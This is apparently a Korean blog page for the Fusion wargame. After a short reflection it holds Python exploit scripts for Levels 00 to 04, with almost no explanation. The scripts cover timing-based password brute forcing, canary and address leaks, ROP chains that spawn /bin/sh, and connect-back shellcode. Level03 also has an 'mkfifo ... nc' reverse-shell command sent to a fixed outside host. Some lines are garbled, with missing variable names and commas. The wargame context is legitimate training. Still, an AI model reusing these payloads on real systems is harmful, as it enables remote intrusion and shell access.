내가 더 공부해야한다고 뼈저리게 느끼게 해준 Wargame이다.

stack이 망한다 할지라도 계속 더 공부를 해야겠다고 느꼈다.

rop 문제를 몇 문제 더 풀면서 heap 공부를 같이 해야겠다.


'Wargame > Fusion' 카테고리의 다른 글

[Fusion] 소감  (0) 2016.11.15
[Fusion] Level04  (0) 2016.11.15
[Fusion] Level03  (0) 2016.11.06
[Fusion] Level02  (0) 2016.10.30
[Fusion] Level01  (0) 2016.10.27
[Fusion] Level00  (0) 2016.10.26
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
from socket import *
from struct import *
from telnetlib import *
import base64, time
 
= lambda x : pack('<L', x)
up = lambda x : unpack('<L', x)
pi = lambda x : pack('<I', x)
 
HOST = "192.168.111.128"
PORT = 20004
 
# Get Password
table = "ABCDEFGHIJKLMNOPQRSTVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
password = ""
 
for i in range(0x10) :
    for j in table :
        s = socket(AF_INET, SOCK_STREAM)
        s.connect((HOST, PORT))
 
        stime = time.time()
 
        s.send("GET / HTTP/1.0\r\nAuthorization: Basic " + base64.encodestring(password + j) + "\r\n\r\n")
        s.recv(1024)
 
        etime = time.time()
 
        if(etime - stime) < 0.002 :
            password += j
            break
print "[*] Password : " + password
s.close()
 
# Get Canary
canary = ""
 
for i in range(4) :
    for j in range(0x100) :
        s = socket(AF_INET, SOCK_STREAM)
        s.connect((HOST, PORT))
 
        payload = password
        payload += "A" * 2032
        payload += canary
        payload += chr(j)
        payload = base64.encodestring(payload).replace("\n""")
 
        s.send("GET / HTTP/1.0\r\nAuthorization: Basic " + payload + "\r\n\r\n")
        check_string = s.recv(1024)
 
        if "stack smashing" not in check_string :
            canary += chr(j)
            break
print "[*] Canary : " + str(hex(up(canary)[0]))
s.close()
 
# Get Base Address
ebx = ""
 
for i in range(4) :
    for j in range(0x100) :
        s = socket(AF_INET, SOCK_STREAM)
        s.connect((HOST, PORT))
 
        payload = password
        payload += "A" * 2032
        payload += canary
        payload += "A" * 12
        payload += ebx
        payload += chr(j)
        payload = base64.encodestring(payload).replace("\n""")
 
        s. send("GET / HTTP/1.0\r\nAuthorization: Basic " + payload + "\r\n\r\n")
 
        try :
            check_string = s.recv(1024)
        except :
            check_string = ""
 
        if "HTTP/1.0 200 Ok" in check_string :
            ebx += chr(j)
            break
print "[*] EBX : " + hex(up(ebx)[0])
s.close()
 
= socket(AF_INET, SOCK_STREAM)
s.connect((HOST ,PORT))
= Telnet()
t.sock = s
 
base_addr = up(ebx)[0- 0x4118
libc_base = base_addr - 0x1a9000
 
read = base_addr + 0xd20
system = libc_base + 0x3cb20
pppr = base_addr + 0x19ba
bss = base_addr + 0x4240 + 0x300
 
s.send("GET / HTTP/1.0\r\n")
 
cmd = "/bin/sh\x00"
 
payload = password
payload += "A" * 2032
payload += canary
payload += "A" * 12
payload += ebx
payload += "A" * 12
payload += p(read)
payload += p(pppr)
payload += p(0)
payload += p(bss)
payload += p(len(cmd))
 
payload += p(system)
payload += "AAAA"
payload += p(bss)
 
payload = base64.encodestring(payload).replace("\n""")
 
s.send("Authorization: Basic " + payload + "\r\n")
 
s.send("/bin/sh\x00")
 
t.interact()
cs


'Wargame > Fusion' 카테고리의 다른 글

[Fusion] 소감  (0) 2016.11.15
[Fusion] Level04  (0) 2016.11.15
[Fusion] Level03  (0) 2016.11.06
[Fusion] Level02  (0) 2016.10.30
[Fusion] Level01  (0) 2016.10.27
[Fusion] Level00  (0) 2016.10.26

[Fusion] Level03


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
from socket import *
from struct import *
import hmac
import hashlib
import itertools
 
= lambda x: pack('<L', x)
 
HOST = "192.168.111.131"
PORT = 20003
 
= socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
 
table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
gadget = [0x804858b0x804858c0x804bbb50x80482a4]
memcpy_plt = 0x8048e60
rand_got = 0x804bd98
pppr = 0x804a26d
popebpret = 0x804a26f
pop_ebx = 0x8049402
pop_eax = 0x8049b4f
add_ebx = 0x80493f9
leaveret = 0x8049431
bss = 0x804bdf4
offset = 0xf7fbd6cc
token = s.recv(1024)[1:-2]
 
attack = ""
attack += p(pop_eax)
attack += p(offset)
attack += "A" * 0x5c
attack += p(pop_ebx)
attack += p((rand_got - 0x5d5b04c4& 0xffffffff)
attack += "AAAA"
attack += p(add_ebx)
 
for i in range(04):
    attack += p(memcpy_plt)
    attack += p(pppr)
    attack += p(bss - i - 5)
    attack += p(gadget[i])
    attack += "\\\\u0100\\\\u0000"
 
attack += p(popebpret)
attack += p(bss - 12)
attack += p(leaveret)
 
payload = 'A' * 123
payload += "\\\\u4242"
payload += "A" * 31
payload += attack
 
for col in itertools.product(table, repeat=4) :
    realpayload = token + "\n"
    realpayload += '{"contents":"mkfifo /tmp/han3l; nc 192.168.44.128 12345 0< /tmp/han3l | /bin/sh 1> /tmp/han3l;", '
    realpayload += '"title":"' + ''.join(col) + payload + '", '
    realpayload += '"serverip":"192.168.44.128:12345"}'
    hash = hmac.new(token, realpayload, hashlib.sha1)
    if hash.hexdigest()[:4== "0000":
        print "[*]Find : " + realpayload
        print "[*]hash : " + hash.hexdigest()
        break
 
s.send(realpayload)
s.close()
cs


'Wargame > Fusion' 카테고리의 다른 글

[Fusion] 소감  (0) 2016.11.15
[Fusion] Level04  (0) 2016.11.15
[Fusion] Level03  (0) 2016.11.06
[Fusion] Level02  (0) 2016.10.30
[Fusion] Level01  (0) 2016.10.27
[Fusion] Level00  (0) 2016.10.26

[Fusion] Level02.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
from struct import *
from socket import *
from telnetlib import *
 
= lambda x : pack('<I', x)
 
HOST = "192.168.111.131"
PORT = 20002
 
= socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
= Telnet()
t.sock = s
 
s.send("E" + p(128+ "\x00" * 128)
s.recv(1024)
key = s.recv(1024)[-0x80:]
print "[*] Get xor key"
 
payload = "A" * 0x20010
payload += p(0x8048860)
payload += p(0x80499bd)
payload += p(0)
payload += p(0x804b420)
payload += p(8)
payload += p(0x80489b0)
payload += "AAAA"
payload += p(0x804b420)
payload += p(0)
payload += p(0)
 
realpayload = ""
for i in range(0len(payload)) :
    realpayload += chr(ord(payload[i]) ^ ord(key[i % 128]))
 
s.send("E" + p(len(realpayload)) + realpayload + "Q")
s.send("/bin/sh\x00")
 
t.interact()
cs


'Wargame > Fusion' 카테고리의 다른 글

[Fusion] 소감  (0) 2016.11.15
[Fusion] Level04  (0) 2016.11.15
[Fusion] Level03  (0) 2016.11.06
[Fusion] Level02  (0) 2016.10.30
[Fusion] Level01  (0) 2016.10.27
[Fusion] Level00  (0) 2016.10.26

[Fusion] Level01


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
from struct import *
from socket import *
 
= lambda x: pack('<L', x)
 
shellcode = ("\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
             "\xb0\x66\xb3\x01\x51\x6a\x06\x6a"
             "\x01\x6a\x02\x89\xe1\xcd\x80\x89"
             "\xc6\xb0\x66\x31\xdb\xb3\x02\x68"
             "\xc0\xa8\x2c\x80\x66\x68\x30\x39\x66\x53\xfe"
             "\xc3\x89\xe1\x6a\x10\x51\x56\x89"
             "\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"
             "\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"
             "\xc0\x52\x68\x6e\x2f\x73\x68\x68"
             "\x2f\x2f\x62\x69\x89\xe3\x52\x53"
             "\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"
             "\x80")
 
HOST = "192.168.111.131"
PORT = 20001
jmp_esp = 0x08049f4f
 
= socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
 
print "Making Exploit Code..."
 
payload = ""
payload += "GET "
payload += "\x90" * 139
payload += p(jmp_esp)
payload += "\x90" * 100
payload += shellcode
payload += " HTTP/1.1"
 
print "Sending Exploit Code..."
s.send(payload)
s.close()
cs


'Wargame > Fusion' 카테고리의 다른 글

[Fusion] 소감  (0) 2016.11.15
[Fusion] Level04  (0) 2016.11.15
[Fusion] Level03  (0) 2016.11.06
[Fusion] Level02  (0) 2016.10.30
[Fusion] Level01  (0) 2016.10.27
[Fusion] Level00  (0) 2016.10.26

[Fusion] Level00


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
from struct import *
from socket import *
 
= lambda x: pack('<L', x)
 
shellcode = ("\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
             "\xb0\x66\xb3\x01\x51\x6a\x06\x6a"
             "\x01\x6a\x02\x89\xe1\xcd\x80\x89"
             "\xc6\xb0\x66\x31\xdb\xb3\x02\x68"
             "\xc0\xa8\x2c\x80\x66\x68\x30\x39\x66\x53\xfe"
             "\xc3\x89\xe1\x6a\x10\x51\x56\x89"
             "\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"
             "\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"
             "\xc0\x52\x68\x6e\x2f\x73\x68\x68"
             "\x2f\x2f\x62\x69\x89\xe3\x52\x53"
             "\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"
             "\x80")
 
HOST = "192.168.111.131"
PORT = 20000
 
= socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
 
print "Sending Exploit Code..."
 
payload = ""
payload += "GET "
payload += "\x90" * 139
payload += p(0xbfd98a48 + 150)
payload += "\x90" * 30
payload += shellcode
payload += " HTTP/1.1"
 
print payload
 
s.send(payload)
s.close()
cs


'Wargame > Fusion' 카테고리의 다른 글

[Fusion] 소감  (0) 2016.11.15
[Fusion] Level04  (0) 2016.11.15
[Fusion] Level03  (0) 2016.11.06
[Fusion] Level02  (0) 2016.10.30
[Fusion] Level01  (0) 2016.10.27
[Fusion] Level00  (0) 2016.10.26

+ Recent posts